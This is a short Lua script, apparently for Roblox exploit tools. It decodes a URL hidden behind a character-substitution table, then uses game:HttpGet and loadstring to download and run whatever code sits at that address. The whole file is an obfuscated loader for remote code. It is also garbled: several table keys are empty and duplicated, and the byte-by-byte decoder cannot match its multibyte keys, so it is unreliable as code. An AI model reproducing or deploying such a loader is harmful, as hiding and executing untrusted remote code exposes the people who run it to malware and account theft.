local MAP={
["Ψ"]="://",[""]="==",["Ġ"]=":",[")"]="/",["}"]=".",["H"]="-",["û"]="_",[""]="?",
["Ω"]="&",["¦"]="#",["ă"]="@",["ç"]="+",[""]="~",["ā"]="!",[""]='"',["Ŧ"]="'",
["ĝ"]=",",["ř"]=";",["&"]="`",["Ŗ"]="|",["©"]="(",["@"]=")",["€"]="{",["Č"]="}",
["Ž"]="a",["q"]="b",["Ŀ"]="c",["g"]="d",["ĕ"]="e",["ë"]="f",["ŏ"]="g",["C"]="h",
["¡"]="i",["đ"]="j",["™"]="k",["ą"]="l",["ÿ"]="m",["Ń"]="n",["ø"]="o",["ē"]="p",
["Ì"]="q",["ŗ"]="r",["Û"]="s",["ŧ"]="t",[""]="u",["j"]="v",["O"]="w",["Ñ"]="x",
["ő"]="y",["ü"]="z",
["Â"]="A",["Ê"]="B",["Ë"]="C",["Ĳ"]="D",["Í"]="E",["Î"]="F",["Ï"]="G",["Ð"]="H",
["Ŋ"]="I",["Ò"]="J",["Ó"]="K",["Ô"]="L",["Õ"]="M",["Ö"]="N",["×"]="O",["Ø"]="P",
["Ù"]="Q",["Ú"]="R",["Ŝ"]="S",["Ü"]="T",["Ý"]="U",["Þ"]="V",["ß"]="W",["à"]="X",
["á"]="Y",["â"]="Z",
["v"]="0",["Ł"]="1",["±"]="2",["º"]="3",["p"]="4",[""]="5",["ƶ"]="6",["¤"]="7",
["ƒ"]="8",["1"]="9"
}

local function decrypt(s)
    local t={}
    for i=1,#s do
        local c=s:sub(i,i)
        t[#t+1]=MAP[c] or c
    end
    return table.concat(t)
end

return function(enc)
    local url=decrypt(enc)
    local src=game:HttpGet(url)
    return loadstring(src)()
end
